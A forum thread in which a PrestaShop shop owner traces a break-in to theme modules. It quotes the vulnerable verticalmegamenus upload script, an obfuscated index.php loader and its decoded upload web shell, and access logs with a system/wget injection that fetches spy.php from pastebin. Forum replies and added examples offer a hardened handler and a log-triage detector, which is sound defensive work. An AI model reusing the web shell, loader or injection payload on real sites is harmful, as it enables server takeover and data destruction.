There is a vulnerability in the supershop theme; my PrestaShop was hacked


TiaNex Shopping

It's very possible the web shell file was uploaded through one of the modules of the supershop theme.

I also installed the kuteshop theme.

Unluckily, the hacker deleted all my website files.

We can be nearly sure the back door PHP file used to get a web shell was uploaded through

 \modules\verticalmegamenus\VerticalMegaMenusUploadImage.php

The code has a serious security problem:

it doesn't verify the file type or check permissions at all.

I bought this theme, but it ruined my store!

 

<?php
require_once(dirname(__FILE__).'/../../config/config.inc.php');
require_once(dirname(__FILE__).'/../../init.php');
require_once(dirname(__FILE__).'/verticalmegamenus.php');
// No authentication or token check: anyone who can reach this URL can upload.
$tempPath = _PS_MODULE_DIR_.'verticalmegamenus/images/temps/';
// The client-supplied name is used verbatim: no extension whitelist, no MIME check.
$fileName = $_FILES["uploadimage"]["name"];
$pathFile = $tempPath.$fileName;
if (($_FILES["uploadimage"]["size"] > 1000000)) {
    echo "File size is greater than 1MB";   // the only validation performed
} else {
    // A .php upload lands in a web-reachable directory and is then served as code.
    if (@move_uploaded_file($_FILES['uploadimage']['tmp_name'], $pathFile)) {
        echo $fileName;
    } else {
        echo "File upload failed.";
    }
}
?>

One of the web shell back door files:

The index.php was modified with this code at the beginning of the file:

<?php
// Loader stage: the function names are split into string fragments so that a
// grep for "create_function", "eval" or "base64_decode" finds nothing. The
// second stage is base64-encoded and only runs when the request carries ?3x=3x.
if (isset($_GET["3x"]) && $_GET["3x"] == "3x") {
    $func = "cr"."ea"."te_"."fun"."ction";
    $x = $func("\$c", "e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
    $x("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");
    exit;
}
?><?php

After decoding:

<?php
// Decoded second stage: a minimal upload form. The destination directory is
// taken straight from the request ("path"), so the operator can write a file
// anywhere the web server user has write access.
$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>Done! Open</a></h1>";
    }
}
echo '<html><head><title>Upload files...</title></head><body>'
   . '<form method=POST enctype="multipart/form-data" action="">'
   . '<input type=text name=path><input type="file" name="files">'
   . '<input type=submit value="UPload"></form></body></html>';
?>

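Added here as an example, not the theme's code and not posted in this thread: a hardened form of the upload handler quoted above. It keeps the "uploadimage" field name, the 1 MB limit and the _PS_MODULE_DIR_ destination from the posted script. The back-office authorization check is an assumption and is left as a fail-closed placeholder ($isAuthorized = false) for the module author to wire to the shop's real employee/token check.

```php
<?php
// Added example (not the theme's code): hardened replacement for the posted
// upload handler. Assumes the caller supplies the result of a real back-office
// permission check; the placeholder below denies everything until that is done.

const UPLOAD_MAX_BYTES = 1000000;                      // same 1 MB cap as the original
const ALLOWED_EXT      = ['jpg', 'jpeg', 'png', 'gif'];
const ALLOWED_MIME     = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Validate one $_FILES entry and return a server-chosen filename to store it
 * under, or null (with $error set) when the upload must be rejected.
 */
function safeImageName(array $file, ?string &$error): ?string
{
    $error = null;
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        $error = 'no file or transfer error';
        return null;
    }
    if ($file['size'] > UPLOAD_MAX_BYTES) {
        $error = 'File size is greater than 1MB';
        return null;
    }
    // 1. Extension whitelist. The client name is used for nothing else, so
    //    "../" or "spy.php" in it can never reach the filesystem.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        $error = 'extension not allowed';
        return null;
    }
    // 2. Content check: the bytes must decode as an allowed image type,
    //    whatever the name claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true) || @getimagesize($file['tmp_name']) === false) {
        $error = 'content is not an allowed image';
        return null;
    }
    // 3. Random server-generated name: the uploader never picks the path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Handle the request; $isAuthorized is the result of the caller's permission check. */
function handleUpload(array $files, bool $isAuthorized, string $tempPath): string
{
    if (!$isAuthorized) {
        http_response_code(403);
        return 'forbidden';
    }
    $file = $files['uploadimage'] ?? [];
    $name = safeImageName($file, $error);
    if ($name === null) {
        http_response_code(400);
        return $error;
    }
    // is_uploaded_file() refuses anything that did not arrive with this HTTP request.
    if (!is_uploaded_file($file['tmp_name'])
        || !move_uploaded_file($file['tmp_name'], $tempPath . $name)) {
        http_response_code(500);
        return 'File upload failed.';
    }
    chmod($tempPath . $name, 0644);   // stored file is never executable
    return $name;
}

if (PHP_SAPI !== 'cli') {
    require_once dirname(__FILE__) . '/../../config/config.inc.php';
    require_once dirname(__FILE__) . '/../../init.php';
    // Assumption / placeholder: replace with the shop's real back-office check
    // (for instance validating an admin token issued by Tools::getAdminTokenLite()).
    // Until then every request is refused.
    $isAuthorized = false;
    $tempPath = _PS_MODULE_DIR_ . 'verticalmegamenus/images/temps/';
    echo htmlspecialchars(handleUpload($_FILES, $isAuthorized, $tempPath), ENT_QUOTES, 'UTF-8');
}
```

Two controls belong outside the script as well: the images/temps/ directory should refuse to execute scripts at all (an .htaccess with php_flag engine off, or a FilesMatch rule denying *.php, or an nginx location returning 403 for .php under that path), so that even a polyglot image renamed .php cannot run; and the request should only ever be reachable from an authenticated back-office session, which is what the placeholder stands for.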

36 minutes ago, NemoPS said:

well yeah, that's a hack. What happens if you replace the content? Are you using any module that allows uploads? I would check those folders first.

Here are some access logs.

Maybe the web shell file was uploaded in the last few lines.

 

216.244.66.229 - - [12/Sep/2019:03:57:49 +0000] "GET /item/1167/chinese-letter-print-restaurant-waitress-jacket-waiter-uniform.html HTTP/1.1" 301 -
217.61.98.64 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:09:44 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:09:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:09:47 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:13:46 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:13:49 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
217.61.98.64 - - [12/Sep/2019:04:14:22 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
217.61.98.64 - - [12/Sep/2019:04:14:23 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297
217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20pastebin.com/raw/USuPKwXE%22); HTTP/1.1" 404 78785
217.61.98.64 - - [12/Sep/2019:04:14:26 +0000] "GET /spy.php HTTP/1.1" 404 78683
217.61.98.64 - - [12/Sep/2019:04:14:27 +0000] "POST /modules/smartprestashopthemeadmin/ajax_smartprestashopthemeadmin.php HTTP/1.1" 404 78744
217.61.98.64 - - [12/Sep/2019:04:15:02 +0000] "POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image HTTP/1.1" 404 78768
217.61.98.64 - - [12/Sep/2019:04:15:03 +0000] "GET /modules/jmsslider/views/img/layers/spy.php HTTP/1.1" 404 78718
217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/groupcategory/GroupCategoryUploadImage.php HTTP/1.1" 200 36
217.61.98.64 - - [12/Sep/2019:04:15:04 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7
217.61.98.64 - - [12/Sep/2019:04:15:05 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3302
216.244.66.197 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620


1 minute ago, razaro said:

Yeah, and it looks like it started from /modules/bamegamenu/ajax_phpcode.php also.

Similar hack to 3 years ago that targeted upload forms.

Check this topic for advice.

Yes, it's from

217.61.98.64 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7

217.61.98.64 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297

I installed this module verticalmegamenus and the first new folder was temps.


  • 1 year later...

The jmsslider module also has a critical security issue in ajax_jmsslider.php.

One can upload any file type with any extension through a POST request to /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image

The uploaded file is moved to the /modules/jmsslider/views/img/layers/ folder.

A sample log follows:

- -  02/Jan/2021:15:04:50 +0200 `POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image` 200 /home/zalupa/htdocs/modules/jmsslider/ajax_jmsslider.php 140.453 4096 42.72%
- -  02/Jan/2021:15:04:51 +0200 `GET /modules/jmsslider/views/img/layers/small.php` 200 /home/zalupa/htdocs/modules/jmsslider/views/img/layers/small.php 0.806 2048 0.00%

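Added example, not part of the thread: a triage script for the pattern both log excerpts in this thread show, a successful POST to a module upload script followed within seconds by a 200 for a .php file in that module's image directory, plus the code-injection probes against ajax_phpcode.php. It parses both the Apache-style lines from the earlier post and the panel-style lines just above. The sample lines are constructed for this example (documentation addresses, a placeholder host instead of the real download URL) and the rule names are this example's own.

```php
<?php
// Added example, not from the thread: access-log triage for the
// upload-then-execute pattern. Reads both log shapes posted here:
//   Apache-style:  IP - - [ts] "METHOD target HTTP/x" status size
//   panel-style:   - -  ts `METHOD target` status ...
// The sample lines at the bottom are constructed (documentation IPs).

const APACHE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})/';
const PANEL_RE  = '/^- -\s+(\S+ \S+) `(\S+) (\S+)` (\d{3})/';

/** Normalise one log line to ip/epoch/method/path/query/status, or null if unparsable. */
function parseLine(string $line): ?array
{
    if (preg_match(APACHE_RE, $line, $m)) {
        [$ip, $ts, $method, $target, $status] = [$m[1], $m[2], $m[3], $m[4], (int) $m[5]];
    } elseif (preg_match(PANEL_RE, $line, $m)) {
        [$ip, $ts, $method, $target, $status] = ['-', $m[1], $m[2], $m[3], (int) $m[4]];
    } else {
        return null;
    }
    $dt = DateTime::createFromFormat('d/M/Y:H:i:s O', $ts);   // both formats use this stamp
    [$path, $query] = array_pad(explode('?', $target, 2), 2, '');
    return [
        'ip' => $ip, 'epoch' => $dt ? $dt->getTimestamp() : 0,
        'method' => strtoupper($method), 'path' => $path,
        'query' => urldecode($query), 'status' => $status,
    ];
}

/**
 * Walk the lines in order and return findings. $window is how long after a
 * successful POST to a module a 200 for a .php under that module still counts
 * as "upload then execute".
 */
function triageLog(array $lines, int $window = 120): array
{
    $findings = [];
    $lastPost = [];                       // module name => epoch of last 200 POST
    foreach ($lines as $i => $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        $module = preg_match('#^/modules/([^/]+)/#', $r['path'], $mm) ? $mm[1] : null;

        // Rule 1: PHP call or download-tool syntax inside a query string.
        // A 404 still matters: it shows what is being tried against the shop.
        if (preg_match('/\b(system|exec|passthru|shell_exec|eval|assert)\s*\(|\b(wget|curl)\s/i', $r['query'])) {
            $findings[] = ['line' => $i + 1, 'rule' => 'code_injection_attempt',
                           'ip' => $r['ip'], 'path' => $r['path']];
        }
        // Rule 2: remember successful POSTs to module scripts (candidate uploads).
        if ($module !== null && $r['method'] === 'POST' && $r['status'] === 200) {
            $lastPost[$module] = $r['epoch'];
        }
        // Rule 3: a .php served with 200 out of a directory meant for images/uploads.
        if ($r['method'] === 'GET' && $r['status'] === 200
            && preg_match('/\.php$/i', $r['path'])
            && preg_match('#/(img|images|uploads?|temps|layers)/#i', $r['path'])) {
            $rule = 'php_executed_from_upload_dir';
            // Rule 4: upgrade when the same module took a successful POST just before.
            if ($module !== null && isset($lastPost[$module])
                && $r['epoch'] - $lastPost[$module] <= $window) {
                $rule = 'upload_then_execute';
            }
            $findings[] = ['line' => $i + 1, 'rule' => $rule,
                           'ip' => $r['ip'], 'path' => $r['path']];
        }
    }
    return $findings;
}

// Constructed sample, modelled on the two excerpts in this thread.
$SAMPLE = [
    '198.51.100.7 - - [12/Sep/2019:04:09:40 +0000] "GET /modules/bamegamenu/ajax_phpcode.php?code=system(%22wget%20-O%20../../spy.php%20example.invalid/x%22); HTTP/1.1" 404 78785',
    '198.51.100.7 - - [12/Sep/2019:04:14:24 +0000] "POST /modules/verticalmegamenus/VerticalMegaMenusUploadImage.php HTTP/1.1" 200 7',
    '198.51.100.7 - - [12/Sep/2019:04:14:25 +0000] "GET /modules/verticalmegamenus/images/temps/spy.php HTTP/1.1" 200 3297',
    '203.0.113.9 - - [12/Sep/2019:04:15:22 +0000] "GET /robots.txt HTTP/1.1" 200 2620',
    '- -  02/Jan/2021:15:04:50 +0200 `POST /modules/jmsslider/ajax_jmsslider.php?action=addLayer&id_slide=attari&data_type=image` 200 /home/example/htdocs/modules/jmsslider/ajax_jmsslider.php 140.453 4096 42.72%',
    '- -  02/Jan/2021:15:04:51 +0200 `GET /modules/jmsslider/views/img/layers/small.php` 200 /home/example/htdocs/modules/jmsslider/views/img/layers/small.php 0.806 2048 0.00%',
];

if (PHP_SAPI === 'cli') {
    // php triage.php access.log   (or no argument to run the constructed sample)
    $lines = isset($argv[1]) ? file($argv[1], FILE_IGNORE_NEW_LINES) : $SAMPLE;
    foreach (triageLog($lines) as $f) {
        printf("line %d  %-28s %-15s %s\n", $f['line'], $f['rule'], $f['ip'], $f['path']);
    }
}
```

On the constructed sample this reports three findings: a code_injection_attempt on the ajax_phpcode.php probe, and upload_then_execute for both the verticalmegamenus temps/spy.php hit and the jmsslider layers/small.php hit, each one second after a 200 POST to the same module. A 200 for any .php under an images directory is worth an alert on its own; the POST-then-GET pairing is what turns "suspicious" into "a file was dropped and ran", which is the point at which the host should be treated as compromised rather than merely probed.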